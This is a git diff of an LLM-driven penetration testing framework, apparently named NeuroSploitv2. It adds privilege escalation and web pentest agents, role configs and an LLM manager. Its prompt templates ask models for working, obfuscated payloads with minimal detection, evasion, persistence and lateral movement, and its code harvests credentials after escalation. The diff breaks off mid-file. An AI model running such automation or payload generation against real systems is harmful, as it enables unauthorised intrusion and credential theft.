+Prioritize reliability and minimal detection.""" + ) + + try: + formatted_prompt = prompt.format( + system_info_json=json.dumps(system_info, indent=2), + escalation_paths_json=json.dumps(escalation_paths, indent=2) + ) + response = self.llm.generate(formatted_prompt, system_prompt) + return json.loads(response) + except Exception as e: + logger.error(f"AI escalation strategy error: {e}") + return {"error": str(e)} + + def _attempt_escalation(self, path: Dict, system_info: Dict) -> Dict: + """Attempt privilege escalation using specified path""" + technique = path.get("technique") + os_type = system_info.get("os") + + result = { + "technique": technique, + "success": False, + "details": {} + } + + try: + if os_type == "linux": + if technique == "suid_exploitation": + result = self.linux_privesc.exploit_suid(path.get("target")) + elif technique == "sudo_exploitation": + result = self.sudo_exploiter.exploit(path.get("target")) + elif technique == "kernel_exploit": + result = self.kernel_exploiter.exploit_linux(path.get("target")) + elif technique == "path_hijacking": + result = self.linux_privesc.exploit_path_hijacking(path.get("target")) + + elif os_type == "windows": + if technique == "service_exploitation": + result = self.windows_privesc.exploit_service(path.get("target")) + elif technique == "always_install_elevated": + result = self.windows_privesc.exploit_msi() + elif technique == "token_impersonation": + result = self.windows_privesc.impersonate_token() + + except Exception as e: + logger.error(f"Escalation error for {technique}: {e}") + result["error"] = str(e) + + return result + + def _harvest_credentials(self, system_info: Dict) -> List[Dict]: + """Harvest credentials after privilege escalation""" + os_type = system_info.get("os") + + if os_type == "linux": + return self.cred_harvester.harvest_linux() + elif os_type == "windows": + return self.cred_harvester.harvest_windows() + + return [] diff --git a/agents/web_pentest_agent.py b/agents/web_pentest_agent.py new file mode 100644 index 0000000..6e7a7dc --- /dev/null +++ b/agents/web_pentest_agent.py @@ -0,0 +1,120 @@ +#!/usr/bin/env python3 +""" +Web Pentest Agent - Specialized agent for web application penetration testing. 
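+Drives WebRecon for discovery, then uses the LLM to triage and prioritize findings.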
+""" + +import json +import logging +from typing import Dict, List +from core.llm_manager import LLMManager +from tools.web_pentest import WebRecon # Import the moved WebRecon tool + +logger = logging.getLogger(__name__) + +class WebPentestAgent: + """Agent responsible for comprehensive web application penetration testing.""" + + def __init__(self, config: Dict): + """Initializes the WebPentestAgent.""" + self.config = config + self.llm = LLMManager(config) + self.web_recon = WebRecon(config) + # Placeholder for web exploitation tools if they become separate classes + # self.web_exploiter = WebExploiter(config) + logger.info("WebPentestAgent initialized") + + def execute(self, target: str, context: Dict) -> Dict: + """Executes the web application penetration testing phase.""" + logger.info(f"Starting web pentest on {target}") + + results = { + "target": target, + "status": "running", + "web_recon_results": {}, + "vulnerability_analysis": [], + "exploitation_attempts": [], + "ai_analysis": {} + } + + try: + # Phase 1: Web Reconnaissance + logger.info("Phase 1: Web Reconnaissance (WebPentestAgent)") + web_recon_output = self.web_recon.analyze(target) + results["web_recon_results"] = web_recon_output + + # Phase 2: Vulnerability Analysis (AI-powered) + logger.info("Phase 2: AI-powered Vulnerability Analysis") + # This part will be improved later with more detailed vulnerability detection in WebRecon + # For now, it will look for findings reported by WebRecon + + potential_vulnerabilities = self._identify_potential_web_vulnerabilities(web_recon_output) + + if potential_vulnerabilities: + results["vulnerability_analysis"] = potential_vulnerabilities + ai_vulnerability_analysis = self._ai_analyze_web_vulnerabilities(potential_vulnerabilities, target) + results["ai_analysis"]["vulnerability_insights"] = ai_vulnerability_analysis + else: + logger.info("No immediate web vulnerabilities identified by WebRecon.") + + # Phase 3: Web Exploitation (Placeholder for now) + # This will integrate with exploitation tools later. + + results["status"] = "completed" + logger.info("Web pentest phase completed") + + except Exception as e: + logger.error(f"Error during web pentest: {e}") + results["status"] = "error" + results["error"] = str(e) + + return results + + def _identify_potential_web_vulnerabilities(self, web_recon_output: Dict) -> List[Dict]: + """ + Identifies potential web vulnerabilities based on WebRecon output. + This is a placeholder and will be enhanced as WebRecon improves. + """ + vulnerabilities = [] + if "vulnerabilities" in web_recon_output: + vulnerabilities.extend(web_recon_output["vulnerabilities"]) + return vulnerabilities + + def _ai_analyze_web_vulnerabilities(self, vulnerabilities: List[Dict], target: str) -> Dict: + """Uses AI to analyze identified web vulnerabilities.""" + prompt = self.llm.get_prompt( + "web_recon", + "ai_analysis_user", + default=f""" +Analyze the following potential web vulnerabilities identified on {target} and provide insights: + +Vulnerabilities: {json.dumps(vulnerabilities, indent=2)} + +Provide: +1. Prioritized list of vulnerabilities +2. Recommended exploitation steps for each (if applicable) +3. Potential impact +4. Remediation suggestions + +Response in JSON format with actionable recommendations. +""" + ) + + system_prompt = self.llm.get_prompt( + "web_recon", + "ai_analysis_system", + default="""You are an expert web penetration tester and security analyst. 
+Provide precise analysis of web vulnerabilities and practical advice for exploitation and remediation.""" + ) + + try: + # Format the user prompt with recon_data + formatted_prompt = prompt.format( + target=target, + vulnerabilities_json=json.dumps(vulnerabilities, indent=2) + ) + response = self.llm.generate(formatted_prompt, system_prompt) + return json.loads(response) + except Exception as e: + logger.error(f"AI web vulnerability analysis error: {e}") + return {"error": str(e), "raw_response": response if 'response' in locals() else None} + diff --git a/config/config-example.json b/config/config-example.json new file mode 100644 index 0000000..f5d6f91 --- /dev/null +++ b/config/config-example.json @@ -0,0 +1,50 @@ +{ + "llm": { + "provider": "gemini", + "model": "gemini-pro", + "api_key": "", + "temperature": 0.7, + "max_tokens": 4096 + }, + "agents": { + "recon": { + "enabled": true, + "priority": 1 + }, + "exploitation": { + "enabled": true, + "priority": 2 + }, + "privilege_escalation": { + "enabled": true, + "priority": 3 + }, + "persistence": { + "enabled": true, + "priority": 4 + }, + "lateral_movement": { + "enabled": true, + "priority": 5 + } + }, + "methodologies": { + "owasp_top10": true, + "cwe_top25": true, + "network_pentest": true, + "ad_pentest": true, + "web_security": true + }, + "tools": { + "nmap": "/usr/bin/nmap", + "metasploit": "/usr/bin/msfconsole", + "burpsuite": "/usr/bin/burpsuite", + "sqlmap": "/usr/bin/sqlmap", + "hydra": "/usr/bin/hydra" + }, + "output": { + "format": "json", + "verbose": true, + "save_artifacts": true + } +} \ No newline at end of file diff --git a/config/config.json b/config/config.json new file mode 100644 index 0000000..e833f2b --- /dev/null +++ b/config/config.json @@ -0,0 +1,140 @@ +{ + "llm": { + "default_profile": "gemini_pro_default", + "profiles": { + "ollama_llama3_default": { + "provider": "ollama", + "model": "llama3:8b", + "api_key": "", + "temperature": 0.7, + "max_tokens": 4096, + "input_token_limit": 8000, + "output_token_limit": 4000, + "cache_enabled": true, + "search_context_level": "medium", + "pdf_support_enabled": false, + "guardrails_enabled": true, + "hallucination_mitigation_strategy": "grounding" + }, + "claude_opus_default": { + "provider": "claude", + "model": "claude-3-opus-20240229", + "api_key": "${ANTHROPIC_API_KEY}", + "temperature": 0.3, + "max_tokens": 4096, + "input_token_limit": 200000, + "output_token_limit": 4000, + "cache_enabled": true, + "search_context_level": "high", + "pdf_support_enabled": true, + "guardrails_enabled": true, + "hallucination_mitigation_strategy": "self_reflection" + }, + "gemini_pro_default": { + "provider": "gemini", + "model": "gemini-pro", + "api_key": "${GEMINI_API_KEY}", + "temperature": 0.7, + "max_tokens": 4096, + "input_token_limit": 30720, + "output_token_limit": 2048, + "cache_enabled": true, + "search_context_level": "medium", + "pdf_support_enabled": true, + "guardrails_enabled": true, + "hallucination_mitigation_strategy": "consistency_check" + }, + "gpt_4o_default": { + "provider": "gpt", + "model": "gpt-4o", + "api_key": "${OPENAI_API_KEY}", + "temperature": 0.5, + "max_tokens": 4096, + "input_token_limit": 128000, + "output_token_limit": 4000, + "cache_enabled": true, + "search_context_level": "high", + "pdf_support_enabled": true, + "guardrails_enabled": true, + "hallucination_mitigation_strategy": "grounding" + } + } + }, + "agent_roles": { + "bug_bounty_hunter": { + "enabled": true, + "llm_profile": "gemini_pro_default", + "tools_allowed": ["subfinder", 
"nuclei", "burpsuite", "sqlmap"], + "description": "Focuses on web application vulnerabilities, leveraging recon and exploitation tools." + }, + "blue_team_agent": { + "enabled": true, + "llm_profile": "claude_opus_default", + "tools_allowed": [], + "description": "Analyzes logs and telemetry for threats, provides defensive strategies." + }, + "exploit_expert": { + "enabled": true, + "llm_profile": "gpt_4o_default", + "tools_allowed": ["metasploit", "nmap"], + "description": "Devises exploitation strategies and payloads for identified vulnerabilities." + }, + "red_team_agent": { + "enabled": true, + "llm_profile": "gemini_pro_default", + "tools_allowed": ["nmap", "metasploit", "hydra"], + "description": "Plans and executes simulated attacks to test an organization's defenses." + }, + "replay_attack_specialist": { + "enabled": true, + "llm_profile": "ollama_llama3_default", + "tools_allowed": ["burpsuite"], + "description": "Identifies and leverages replay attack vectors in network traffic or authentication." + }, + "pentest_generalist": { + "enabled": true, + "llm_profile": "gemini_pro_default", + "tools_allowed": ["nmap", "subfinder", "nuclei", "metasploit", "burpsuite", "sqlmap", "hydra"], + "description": "Performs comprehensive penetration tests across various domains." + }, + "owasp_expert": { + "enabled": true, + "llm_profile": "gemini_pro_default", + "tools_allowed": ["burpsuite", "sqlmap"], + "description": "Specializes in assessing web applications against OWASP Top 10 vulnerabilities." + }, + "cwe_expert": { + "enabled": true, + "llm_profile": "claude_opus_default", + "tools_allowed": [], + "description": "Analyzes code and reports for weaknesses based on MITRE CWE Top 25." + }, + "malware_analyst": { + "enabled": true, + "llm_profile": "gpt_4o_default", + "tools_allowed": [], + "description": "Examines malware samples to understand functionality and identify IOCs." 
+    }
+  },
+  "methodologies": {
+    "owasp_top10": true,
+    "cwe_top25": true,
+    "network_pentest": true,
+    "ad_pentest": true,
+    "web_security": true
+  },
+  "tools": {
+    "nmap": "/usr/bin/nmap",
+    "metasploit": "/usr/bin/msfconsole",
+    "burpsuite": "/usr/bin/burpsuite",
+    "sqlmap": "/usr/bin/sqlmap",
+    "hydra": "/usr/bin/hydra",
+    "subfinder": "/usr/local/bin/subfinder",
+    "nuclei": "/usr/local/bin/nuclei"
+  },
+  "output": {
+    "format": "json",
+    "verbose": true,
+    "save_artifacts": true
+  }
+}
\ No newline at end of file
diff --git a/core/__init__.py b/core/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/core/llm_manager.py b/core/llm_manager.py
new file mode 100644
index 0000000..1b63459
--- /dev/null
+++ b/core/llm_manager.py
@@ -0,0 +1,651 @@
+#!/usr/bin/env python3
+"""
+LLM Manager - Unified interface for multiple LLM providers
+Supports: Claude, GPT, Gemini, Ollama, and custom models
+"""
+
+import os
+import json
+import subprocess
+from typing import Dict, List, Optional, Any
+import logging
+import requests
+from pathlib import Path
+import re
+
+logger = logging.getLogger(__name__)
+
+
+class LLMManager:
+    """Manage multiple LLM providers"""
+
+    def __init__(self, config: Dict):
+        """Initialize LLM manager"""
+        self.config = config.get('llm', {})
+        self.default_profile_name = self.config.get('default_profile', 'gemini_pro_default')
+        self.profiles = self.config.get('profiles', {})
+
+        self.active_profile = self.profiles.get(self.default_profile_name, {})
+
+        # Load active profile settings
+        self.provider = self.active_profile.get('provider', 'gemini').lower()
+        self.model = self.active_profile.get('model', 'gemini-pro')
+        self.api_key = self._get_api_key(self.active_profile.get('api_key', ''))
+        self.temperature = self.active_profile.get('temperature', 0.7)
+        self.max_tokens = self.active_profile.get('max_tokens', 4096)
+
+        # New LLM parameters
+        self.input_token_limit = self.active_profile.get('input_token_limit', 4096)
+        self.output_token_limit = self.active_profile.get('output_token_limit', 4096)
+        self.cache_enabled = self.active_profile.get('cache_enabled', False)
+        self.search_context_level = self.active_profile.get('search_context_level', 'medium')  # low, medium, high
+        self.pdf_support_enabled = self.active_profile.get('pdf_support_enabled', False)
+        self.guardrails_enabled = self.active_profile.get('guardrails_enabled', False)
+        self.hallucination_mitigation_strategy = self.active_profile.get('hallucination_mitigation_strategy', None)
+
+        # Prompt loading: a JSON library plus per-role Markdown files
+        self.json_prompts_file_path = Path("prompts/library.json")
+        self.md_prompts_dir_path = Path("prompts/md_library")
+        self.prompts = self._load_all_prompts()
+
+        logger.info(f"Initialized LLM Manager - Provider: {self.provider}, Model: {self.model}, Profile: {self.default_profile_name}")
+
+    def _get_api_key(self, api_key_config: str) -> str:
+        """Helper to get API key from config or environment variable"""
+        if api_key_config.startswith('${') and api_key_config.endswith('}'):
+            env_var = api_key_config[2:-1]
+            return os.getenv(env_var, '')
+        return api_key_config
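+
+    # A worked example of the "${ENV_VAR}" convention used by config/config.json:
+    # "api_key": "${GEMINI_API_KEY}" resolves to os.getenv("GEMINI_API_KEY", ""),
+    # while any other string is returned unchanged, so keys can also be stored
+    # inline.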
+
+    def _load_all_prompts(self) -> Dict:
+        """Load prompts from both JSON library and Markdown library files."""
+        all_prompts = {
+            "json_prompts": {},
+            "md_prompts": {}
+        }
+
+        # Load from JSON library
+        if self.json_prompts_file_path.exists():
+            try:
+                with open(self.json_prompts_file_path, 'r') as f:
+                    all_prompts["json_prompts"] = json.load(f)
+                logger.info(f"Loaded prompts from JSON library: {self.json_prompts_file_path}")
+            except Exception as e:
+                logger.error(f"Error loading prompts from {self.json_prompts_file_path}: {e}")
+        else:
+            logger.warning(f"JSON prompts file not found at {self.json_prompts_file_path}. Some AI functionality may be limited.")
+
+        # Load from Markdown library
+        if self.md_prompts_dir_path.is_dir():
+            for md_file in self.md_prompts_dir_path.glob("*.md"):
+                try:
+                    content = md_file.read_text()
+                    prompt_name = md_file.stem  # Use filename as prompt name
+
+                    user_prompt_match = re.search(r"## User Prompt\n(.*?)(?=\n## System Prompt|\Z)", content, re.DOTALL)
+                    system_prompt_match = re.search(r"## System Prompt\n(.*?)(?=\n## User Prompt|\Z)", content, re.DOTALL)
+
+                    user_prompt = user_prompt_match.group(1).strip() if user_prompt_match else ""
+                    system_prompt = system_prompt_match.group(1).strip() if system_prompt_match else ""
+
+                    if user_prompt or system_prompt:
+                        all_prompts["md_prompts"][prompt_name] = {
+                            "user_prompt": user_prompt,
+                            "system_prompt": system_prompt
+                        }
+                    else:
+                        logger.warning(f"No valid User or System Prompt found in {md_file.name}. Skipping.")
+                except Exception as e:
+                    logger.error(f"Error loading prompt from {md_file.name}: {e}")
+            logger.info(f"Loaded {len(all_prompts['md_prompts'])} prompts from Markdown library.")
+        else:
+            logger.warning(f"Markdown prompts directory not found at {self.md_prompts_dir_path}. Some AI functionality may be limited.")
+
+        return all_prompts
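+
+    # Expected shape of a prompts/md_library/*.md file, inferred from the
+    # regexes in _load_all_prompts (no such file ships in this diff):
+    #
+    #   ## User Prompt
+    #   Analyze the target and summarize its attack surface.
+    #
+    #   ## System Prompt
+    #   You are a cautious security analyst.
+    #
+    # The filename stem (e.g. red_team_agent.md) becomes the category key under
+    # "md_prompts", with "user_prompt" / "system_prompt" as the leaf names.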
+
+    def get_prompt(self, library_type: str, category: str = "", name: str = "", default: str = "") -> str:
+        """Retrieve a specific prompt by library type, category, and name.
+
+        `library_type` can be "json_prompts" or "md_prompts".
+        `category` can be a JSON top-level key (e.g., 'exploitation') or an MD filename (e.g., 'red_team_agent').
+        `name` can be a JSON sub-key (e.g., 'ai_exploit_planning_user') or 'user_prompt'/'system_prompt' for MD.
+
+        Agents may also call this as get_prompt(category, name, default=...);
+        in that two-argument form the library type defaults to "json_prompts".
+        """
+        if not name and category:
+            # Two-argument form: shift (category, name) into place.
+            library_type, category, name = "json_prompts", library_type, category
+        return self.prompts.get(library_type, {}).get(category, {}).get(name, default)
+
+    def generate(self, prompt: str, system_prompt: Optional[str] = None) -> str:
+        """Generate response from LLM and apply hallucination mitigation if configured."""
+        raw_response = ""
+        try:
+            if self.provider == 'claude':
+                raw_response = self._generate_claude(prompt, system_prompt)
+            elif self.provider == 'gpt':
+                raw_response = self._generate_gpt(prompt, system_prompt)
+            elif self.provider == 'gemini':
+                raw_response = self._generate_gemini(prompt, system_prompt)
+            elif self.provider == 'ollama':
+                raw_response = self._generate_ollama(prompt, system_prompt)
+            elif self.provider == 'gemini-cli':
+                raw_response = self._generate_gemini_cli(prompt, system_prompt)
+            else:
+                raise ValueError(f"Unsupported provider: {self.provider}")
+        except Exception as e:
+            logger.error(f"Error generating raw response: {e}")
+            return f"Error: {str(e)}"
+
+        if self.guardrails_enabled:
+            raw_response = self._apply_guardrails(raw_response)
+
+        if self.hallucination_mitigation_strategy in ("grounding", "self_reflection", "consistency_check"):
+            logger.debug(f"Applying hallucination mitigation strategy: {self.hallucination_mitigation_strategy}")
+            return self._mitigate_hallucination(raw_response, prompt, system_prompt)
+
+        return raw_response
+
+    def _apply_guardrails(self, response: str) -> str:
+        """Applies basic guardrails to the LLM response."""
+        if not self.guardrails_enabled:
+            return response
+
+        logger.debug("Applying guardrails...")
+        # Simple keyword filtering with placeholder keywords.
+        harmful_keywords = ["malicious_exploit_command", "destroy_system", "wipe_data", "unauthorized_access"]
+
+        for keyword in harmful_keywords:
+            if keyword in response.lower():
+                logger.warning(f"Guardrail triggered: Found potentially harmful keyword '{keyword}'. Response will be sanitized or flagged.")
+                # A more robust solution would redact, re-prompt, or flag for
+                # human review; here we simply replace the keyword.
+                response = response.replace(keyword, "[REDACTED_HARMFUL_CONTENT]")
+                response = response.replace(keyword.upper(), "[REDACTED_HARMFUL_CONTENT]")
+
+        # Length check, roughly estimating tokens by word count against the
+        # profile's output_token_limit.
+        if len(response.split()) > self.output_token_limit * 1.5:
+            logger.warning("Guardrail triggered: Response is excessively long. Truncating.")
+            response = " ".join(response.split()[:int(self.output_token_limit * 1.5)]) + "\n[RESPONSE TRUNCATED BY GUARDRAIL]"
+
+        # Very simplistic ethical check; a real one would be more nuanced (e.g.,
+        # a dedicated review prompt). For now, flag explicit unethical wording.
+        if any(bad_phrase in response.lower() for bad_phrase in ["perform illegal activity", "bypass security illegally"]):
+            logger.warning("Guardrail triggered: Response contains potentially unethical instructions. Flagging for review.")
+            response = "[UNETHICAL CONTENT FLAGGED FOR REVIEW]\n" + response
+
+        return response
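+
+    # A minimal usage sketch of the pipeline above (the config path and prompt
+    # text are illustrative, not fixtures from this repo):
+    #
+    #   with open("config/config.json") as f:
+    #       manager = LLMManager(json.load(f))
+    #   answer = manager.generate(
+    #       "Summarize the exposed services on the target.",
+    #       system_prompt="You are a network analyst.",
+    #   )
+    #
+    # generate() dispatches on the active profile's provider, then applies
+    # _apply_guardrails() and, if a strategy is configured,
+    # _mitigate_hallucination().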
+
+    def _mitigate_hallucination(self, raw_response: str, original_prompt: str, original_system_prompt: Optional[str]) -> str:
+        """Applies the configured hallucination mitigation strategy."""
+        strategy = self.hallucination_mitigation_strategy
+
+        # Temporarily disable mitigation to prevent infinite recursion when
+        # calling self.generate() internally.
+        original_mitigation_state = self.hallucination_mitigation_strategy
+        self.hallucination_mitigation_strategy = None
+
+        try:
+            if strategy == "grounding":
+                verification_prompt = (
+                    f"Review the following response:\n\n---\n{raw_response}\n---\n\n"
+                    f"Based *only* on the context provided in the original prompt (user: '{original_prompt}', system: '{original_system_prompt or 'None'}'), "
+                    f"is this response factual and directly supported by the context? If not, correct it to be factual. "
+                    f"If the response is completely unsourced or makes claims beyond the context, state 'UNSOURCED'."
+                )
+                logger.debug("Applying grounding strategy: Re-prompting for factual verification.")
+                return self.generate(verification_prompt, "You are a fact-checker whose sole purpose is to verify LLM output against provided context.")
+
+            elif strategy == "self_reflection":
+                reflection_prompt = (
+                    f"Critically review the following response for accuracy, logical consistency, and adherence to the original prompt's instructions:\n\n"
+                    f"Original Prompt (User): {original_prompt}\n"
+                    f"Original Prompt (System): {original_system_prompt or 'None'}\n\n"
+                    f"Generated Response: {raw_response}\n\n"
+                    f"Identify any potential hallucinations, inconsistencies, or areas where the response might have deviated from facts or instructions. "
+                    f"If you find issues, provide a corrected and more reliable version of the response. If the response is good, state 'ACCURATE'."
+                )
+                logger.debug("Applying self-reflection strategy: Re-prompting for self-critique.")
+                return self.generate(reflection_prompt, "You are an AI assistant designed to critically evaluate and improve other AI-generated content.")
+
+            elif strategy == "consistency_check":
+                logger.debug("Applying consistency check strategy: Generating multiple responses for comparison.")
+                responses = []
+                for i in range(3):  # Generate three responses for the consistency check
+                    logger.debug(f"Generating response {i+1} for consistency check.")
+                    res = self.generate(original_prompt, original_system_prompt)
+                    responses.append(res)
+
+                if len(set(responses)) == 1:
+                    return responses[0]
+                else:
+                    logger.warning("Consistency check found varying responses. Attempting to synthesize a consistent answer.")
+                    synthesis_prompt = (
+                        f"Synthesize a single, consistent, and factual response from the following AI-generated options. "
+                        f"Prioritize factual accuracy and avoid information present in only one response if contradictory. 
" + f"If there's significant disagreement, state the core disagreement.\n\n" + f"Options:\n" + "\n---\n".join(responses) + ) + return self.generate(synthesis_prompt, "You are a highly analytical AI assistant tasked with synthesizing consistent information from multiple sources.") + + return raw_response # Fallback if strategy not recognized or implemented + finally: + self.hallucination_mitigation_strategy = original_mitigation_state # Restore original state + + def _generate_claude(self, prompt: str, system_prompt: Optional[str] = None) -> str: + """Generate using Claude API""" + import anthropic + + client = anthropic.Anthropic(api_key=self.api_key) + + messages = [{"role": "user", "content": prompt}] + + response = client.messages.create( + model=self.model, + max_tokens=self.max_tokens, + temperature=self.temperature, + system=system_prompt or "", + messages=messages + ) + + return response.content[0].text + + def _generate_gpt(self, prompt: str, system_prompt: Optional[str] = None) -> str: + """Generate using OpenAI GPT API""" + import openai + + client = openai.OpenAI(api_key=self.api_key) + + messages = [] + if system_prompt: + messages.append({"role": "system", "content": system_prompt}) + messages.append({"role": "user", "content": prompt}) + + response = client.chat.completions.create( + model=self.model, + messages=messages, + temperature=self.temperature, + max_tokens=self.max_tokens + ) + + return response.choices[0].message.content + + def _generate_gemini(self, prompt: str, system_prompt: Optional[str] = None) -> str: + """Generate using Google Gemini API""" + import google.generativeai as genai + + genai.configure(api_key=self.api_key) + model = genai.GenerativeModel(self.model) + + full_prompt = prompt + if system_prompt: + full_prompt = f"{system_prompt}\n\n{prompt}" + + response = model.generate_content( + full_prompt, + generation_config={ + 'temperature': self.temperature, + 'max_output_tokens': self.max_tokens, + } + ) + + return response.text + + def _generate_gemini_cli(self, prompt: str, system_prompt: Optional[str] = None) -> str: + """Generate using Gemini CLI""" + try: + full_prompt = prompt + if system_prompt: + full_prompt = f"{system_prompt}\n\n{prompt}" + + # Use gemini CLI tool + cmd = ['gemini', 'chat', '-m', self.model] + + result = subprocess.run( + cmd, + input=full_prompt.encode(), + capture_output=True, + timeout=120 + ) + + if result.returncode == 0: + return result.stdout.decode().strip() + else: + error = result.stderr.decode().strip() + logger.error(f"Gemini CLI error: {error}") + return f"Error: {error}" + + except subprocess.TimeoutExpired: + logger.error("Gemini CLI timeout") + return "Error: Request timeout" + except Exception as e: + logger.error(f"Gemini CLI error: {e}") + return f"Error: {str(e)}" + + def _generate_ollama(self, prompt: str, system_prompt: Optional[str] = None) -> str: + """Generate using Ollama local models""" + try: + url = "http://localhost:11434/api/generate" + + data = { + "model": self.model, + "prompt": prompt, + "stream": False, + "options": { + "temperature": self.temperature, + "num_predict": self.max_tokens + } + } + + if system_prompt: + data["system"] = system_prompt + + response = requests.post(url, json=data, timeout=120) + response.raise_for_status() + + return response.json()["response"] + + except Exception as e: + logger.error(f"Ollama error: {e}") + return f"Error: {str(e)}" + + def analyze_vulnerability(self, vulnerability_data: Dict) -> Dict: + """Analyze vulnerability and suggest exploits""" + # This 
+    def analyze_vulnerability(self, vulnerability_data: Dict) -> Dict:
+        """Analyze a vulnerability and suggest exploits."""
+        # Fetched from library.json when available; the inline default below is
+        # used as a fallback.
+        prompt = self.get_prompt("json_prompts", "exploitation", "analyze_vulnerability_user", default=f"""
+Analyze the following vulnerability data and provide exploitation recommendations:
+
+Vulnerability: {json.dumps(vulnerability_data, indent=2)}
+
+Provide:
+1. Severity assessment (Critical/High/Medium/Low)
+2. Exploitation difficulty
+3. Potential impact
+4. Recommended exploit techniques
+5. Detection evasion strategies
+6. Post-exploitation actions
+
+Response in JSON format.
+""")
+        system_prompt = self.get_prompt("json_prompts", "exploitation", "analyze_vulnerability_system", default="""You are an expert penetration tester and security researcher.
+Analyze vulnerabilities and provide detailed, actionable exploitation strategies.
+Consider OWASP, CWE, and MITRE ATT&CK frameworks.
+Always include ethical considerations and legal boundaries.""")
+
+        response = self.generate(prompt, system_prompt)
+
+        try:
+            return json.loads(response)
+        except json.JSONDecodeError:
+            return {"raw_response": response}
+
+    def generate_payload(self, target_info: Dict, vulnerability_type: str) -> str:
+        """Generate an exploit payload."""
+        # Fetched from library.json when available; the inline default below is
+        # used as a fallback.
+        prompt = self.get_prompt("json_prompts", "exploitation", "generate_payload_user", default=f"""
+Generate an exploit payload for the following scenario:
+
+Target Information:
+{json.dumps(target_info, indent=2)}
+
+Vulnerability Type: {vulnerability_type}
+
+Requirements:
+1. Generate a working payload
+2. Include obfuscation techniques
+3. Add error handling
+4. Ensure minimal detection footprint
+5. Include cleanup procedures
+
+Provide the payload code with detailed comments.
+""")
+        system_prompt = self.get_prompt("json_prompts", "exploitation", "generate_payload_system", default="""You are an expert exploit developer.
+Generate sophisticated, tested payloads that are effective yet responsible.
+Always include safety mechanisms and ethical guidelines.""")
+
+        return self.generate(prompt, system_prompt)
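+    # Example call (hypothetical data):
+    #     payload = llm.generate_payload(
+    #         {"host": "10.0.0.5", "service": "http", "version": "Apache 2.4.49"},
+    #         "path_traversal",
+    #     )
+    # Unlike the JSON-returning helpers, the return value here is free-form
+    # text (code plus comments).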
+    def suggest_privilege_escalation(self, system_info: Dict) -> List[str]:
+        """Suggest privilege escalation techniques."""
+        # Fetched from library.json when available; the inline default below is
+        # used as a fallback.
+        prompt = self.get_prompt("json_prompts", "privesc", "suggest_privilege_escalation_user", default=f"""
+Based on the following system information, suggest privilege escalation techniques:
+
+System Info:
+{json.dumps(system_info, indent=2)}
+
+Provide:
+1. Top 5 privilege escalation vectors
+2. Required tools and commands
+3. Detection likelihood
+4. Success probability
+5. Alternative approaches
+
+Response in JSON format with prioritized list.
+""")
+
+        system_prompt = self.get_prompt("json_prompts", "privesc", "suggest_privilege_escalation_system", default="""You are a privilege escalation specialist.
+Analyze system configurations and suggest effective escalation paths.
+Consider Windows, Linux, and Active Directory environments.""")
+
+        response = self.generate(prompt, system_prompt)
+
+        try:
+            result = json.loads(response)
+            return result.get('techniques', [])
+        except (json.JSONDecodeError, AttributeError):
+            # AttributeError covers the case where the model returns a JSON
+            # array rather than an object.
+            return []
+
+    def analyze_network_topology(self, scan_results: Dict) -> Dict:
+        """Analyze network topology and suggest attack paths."""
+        # Fetched from library.json when available; the inline default below is
+        # used as a fallback.
+        prompt = self.get_prompt("json_prompts", "network_recon", "analyze_network_topology_user", default=f"""
+Analyze the network topology and suggest attack paths:
+
+Scan Results:
+{json.dumps(scan_results, indent=2)}
+
+Provide:
+1. Network architecture overview
+2. Critical assets identification
+3. Attack surface analysis
+4. Recommended attack paths (prioritized)
+5. Lateral movement opportunities
+6. Persistence locations
+
+Response in JSON format.
+""")
+
+        system_prompt = self.get_prompt("json_prompts", "network_recon", "analyze_network_topology_system", default="""You are a network penetration testing expert.
+Analyze network structures and identify optimal attack vectors.
+Consider defense-in-depth and detection mechanisms.""")
+
+        response = self.generate(prompt, system_prompt)
+
+        try:
+            return json.loads(response)
+        except json.JSONDecodeError:
+            return {"raw_response": response}
+
+    def analyze_web_vulnerability(self, vulnerability_type: str, vulnerability_data: Dict) -> Dict:
+        """Analyze a specific web vulnerability using the matching prompt pair from library.json."""
+        user_prompt_name = f"{vulnerability_type.lower()}_user"
+        system_prompt_name = f"{vulnerability_type.lower()}_system"
+
+        # Dynamically fetch the user prompt template for this vulnerability type
+        user_prompt_template = self.get_prompt("json_prompts", "vulnerability_testing", user_prompt_name)
+        if not user_prompt_template:
+            logger.warning(f"No user prompt found for vulnerability type: {vulnerability_type}")
+            return {"error": f"No user prompt template for {vulnerability_type}"}
+
+        # Each supported type uses a different placeholder name in its template;
+        # map them once instead of chaining if/elif branches per type.
+        placeholder_names = {
+            "ssrf": "http_data_json",
+            "sql_injection": "input_data_json",
+            "xss": "xss_data_json",
+            "lfi": "lfi_data_json",
+            "broken_object": "api_data_json",
+            "broken_auth": "auth_data_json",
+        }
+        vuln_key = vulnerability_type.lower()
+        if vuln_key not in placeholder_names:
+            logger.warning(f"Unsupported vulnerability type for analysis: {vulnerability_type}")
+            return {"error": f"Unsupported vulnerability type: {vulnerability_type}"}
+
+        prompt = user_prompt_template.format(
+            **{placeholder_names[vuln_key]: json.dumps(vulnerability_data, indent=2)}
+        )
+
+        system_prompt = self.get_prompt("json_prompts", "vulnerability_testing", system_prompt_name)
+        if not system_prompt:
+            logger.warning(f"No system prompt found for vulnerability type: {vulnerability_type}. Using a generic fallback.")
+            system_prompt = "You are an expert web security tester. Analyze the provided data for vulnerabilities and offer exploitation steps and remediation."
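+        # The library prompts instruct the model to answer in JSON; the parse
+        # below therefore attempts json.loads first and falls back to returning
+        # the raw text when the model deviates from that contract.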
+ + response = self.generate(prompt, system_prompt) + + try: + return json.loads(response) + except json.JSONDecodeError: + logger.error(f"Failed to decode JSON response for {vulnerability_type} analysis: {response}") + return {"raw_response": response} + except Exception as e: + logger.error(f"Error during {vulnerability_type} analysis: {e}") + return {"error": str(e), "raw_response": response} + + diff --git a/custom_agents/__init__.py b/custom_agents/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/custom_agents/example_agent.py b/custom_agents/example_agent.py new file mode 100644 index 0000000..f31ea67 --- /dev/null +++ b/custom_agents/example_agent.py @@ -0,0 +1,83 @@ +#!/usr/bin/env python3 +""" +Example Custom Agent for NeuroSploitv2 +This demonstrates how to create custom agents for specific tasks +""" + +import logging +from typing import Dict +from core.llm_manager import LLMManager + +logger = logging.getLogger(__name__) + + +class CustomAgent: + """Example custom agent - Web API Security Scanner""" + + def __init__(self, config: Dict): + """Initialize custom agent""" + self.config = config + self.llm = LLMManager(config) + self.name = "WebAPIScanner" + logger.info(f"{self.name} initialized") + + def execute(self, target: str, context: Dict) -> Dict: + """Execute custom agent logic""" + logger.info(f"Running {self.name} on {target}") + + results = { + 